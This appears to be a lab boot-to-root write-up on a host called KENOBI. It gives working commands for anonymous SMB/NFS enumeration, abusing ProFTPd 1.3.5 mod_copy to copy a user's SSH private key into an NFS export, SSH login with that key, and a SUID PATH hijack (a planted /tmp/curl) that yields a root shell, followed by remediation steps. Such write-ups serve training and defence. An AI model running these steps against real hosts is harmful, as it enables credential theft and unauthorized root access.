Case file

Samba enumeration, ProFTPd mod_copy, and SUID PATH hijack

Linux host assessment: anonymous SMB and NFS exposure, unauthenticated ProFTPd 1.3.5 SITE CPFR/CPTO abuse to exfiltrate an SSH private key, then PATH hijack of a SUID menu binary to root.

Foundations28 minLinux · SMB · FTP · Privilege Escalation
  • Target KENOBI exposed FTP, SSH, HTTP, RPC/NFS, and Samba. We chained anonymous share access, NFS mount of /var, and ProFTPd mod_copy into SSH as kenobi, then escalated via a SUID binary that invoked curl from PATH.

  • Versioned TCP scan identified seven open ports including ProFTPD 1.3.5, OpenSSH, Apache, rpcbind, Samba, and NFS.

  • Anonymous Samba share exposed log.txt. NFS showmount listed /var with world-readable contents including tmp — the staging area for the stolen key.

  • Banner grab confirmed 1.3.5. searchsploit listed mod_copy RCE. SITE CPFR/CPTO copied /home/kenobi/.ssh/id_rsa into /var/tmp, then we mounted NFS and SSH’d in.

  • find located /usr/bin/menu with the SUID bit. Option 1 invoked curl from PATH. We planted /tmp/curl → /bin/sh and prepended /tmp to PATH for a root shell.

01

Engagement summary

Target KENOBI exposed FTP, SSH, HTTP, RPC/NFS, and Samba. We chained anonymous share access, NFS mount of /var, and ProFTPd mod_copy into SSH as kenobi, then escalated via a SUID binary that invoked curl from PATH.

This case covers a Linux boot-to-root against host KENOBI (10.10.101.17). Initial access did not require credentials: Samba allowed anonymous read of an operational log, NFS exported /var, and ProFTPD 1.3.5 accepted unauthenticated SITE CPFR/CPTO to copy kenobi’s SSH private key into the NFS export. Privilege escalation abused /usr/bin/menu, a SUID binary that executed curl without a full path.

Business impact

Anonymous file shares plus a known FTP RCE pattern yielded interactive SSH. A single SUID helper with relative binary resolution completed the path to root. Remediate by disabling anonymous SMB/NFS, patching or removing ProFTPd 1.3.5, and removing or rewriting SUID helpers that shell out to PATH-resolved tools.

02

Service discovery

Versioned TCP scan identified seven open ports including ProFTPD 1.3.5, OpenSSH, Apache, rpcbind, Samba, and NFS.

Service and version scan

OPERATOR · NMAP

savvy@lab:~$ nmap 10.10.101.17 -sV -Pn

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.5

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

111/tcp open rpcbind 2-4 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

2049/tcp open nfs 2-4 (RPC #100003)

Service Info: Host: KENOBI; OS: Linux

03

SMB and NFS enumeration

Anonymous Samba share exposed log.txt. NFS showmount listed /var with world-readable contents including tmp — the staging area for the stolen key.

Share enumeration as guest

OPERATOR · SMB ENUM

savvy@lab:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.101.17

| smb-enum-shares:

| \\10.10.101.17\anonymous: Anonymous access: READ/WRITE

| \\10.10.101.17\IPC$: Anonymous access: READ/WRITE

| \\10.10.101.17\print$: Anonymous access: <none>

Pull log.txt from anonymous share

OPERATOR · SMBCLIENT

savvy@lab:~$ smbclient //10.10.101.17/anonymous

Password for [WORKGROUP\operator]:

smb: \> ls

log.txt N 12237 Wed Sep 4 16:19:09 2019

smb: \> get log.txt

getting file \log.txt of size 12237 as log.txt

log.txt documented SSH key generation for user kenobi and confirmed ProFTPD on port 21. We next enumerated NFS via rpcbind.

Showmount and list /var export

OPERATOR · NFS

savvy@lab:~$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.101.17

| nfs-showmount:

|_ /var *

| nfs-ls: Volume /var

| backups cache crash local lock log snap www

04

ProFTPd 1.3.5 mod_copy → SSH key theft

Banner grab confirmed 1.3.5. searchsploit listed mod_copy RCE. SITE CPFR/CPTO copied /home/kenobi/.ssh/id_rsa into /var/tmp, then we mounted NFS and SSH’d in.

FTP version confirmation

OPERATOR · BANNER

savvy@lab:~$ nc 10.10.101.17 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.101.17]

Known mod_copy issues for 1.3.5

OPERATOR · SEARCHSPLOIT

savvy@lab:~$ searchsploit ProFTPD 1.3.5

ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py

ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt

mod_copy implements SITE CPFR and SITE CPTO for unauthenticated filesystem copies. We copied kenobi’s private key into the NFS-exported /var/tmp path.

Unauthenticated key copy into NFS path

OPERATOR · MOD_COPY

savvy@lab:~$ nc 10.10.101.17 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.101.17]

SITE CPFR /home/kenobi/.ssh/id_rsa

350 File or directory exists, ready for destination name

SITE CPTO /var/tmp/id_rsa

250 Copy successful

Mount export, stage key, authenticate

OPERATOR · NFS MOUNT + SSH

savvy@lab:~$ mkdir /mnt/kenobiNFS

savvy@lab:~$ mount 10.10.101.17:/var /mnt/kenobiNFS

savvy@lab:~$ cp /mnt/kenobiNFS/tmp/id_rsa .

savvy@lab:~$ chmod 600 id_rsa

savvy@lab:~$ ssh kenobi@10.10.101.17 -i id_rsa

Welcome to Ubuntu 16.04.6 LTS

savvy@lab:~$

05

SUID menu binary and PATH hijack

find located /usr/bin/menu with the SUID bit. Option 1 invoked curl from PATH. We planted /tmp/curl → /bin/sh and prepended /tmp to PATH for a root shell.

Unusual SUID binary: /usr/bin/menu

OPERATOR · SUID ENUM

savvy@lab:~$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/menu

/usr/bin/sudo

# … standard SUID helpers omitted

Interactive SUID helper

OPERATOR · MENU

savvy@lab:~$ /usr/bin/menu

***************************************

1. status check

2. kernel version

3. ifconfig

** Enter your choice :

Replace curl resolution and trigger option 1

OPERATOR · PATH HIJACK

savvy@lab:~$ cd /tmp

savvy@lab:/tmp$ echo /bin/sh > curl

savvy@lab:/tmp$ chmod 777 curl

savvy@lab:/tmp$ export PATH=/tmp:$PATH

savvy@lab:/tmp$ /usr/bin/menu

** Enter your choice :1

#

Remediation

Remove SUID from non-essential binaries. If a helper must call external tools, use absolute paths and drop privileges. Patch ProFTPd, disable anonymous Samba/NFS, and rotate any SSH keys that left the host.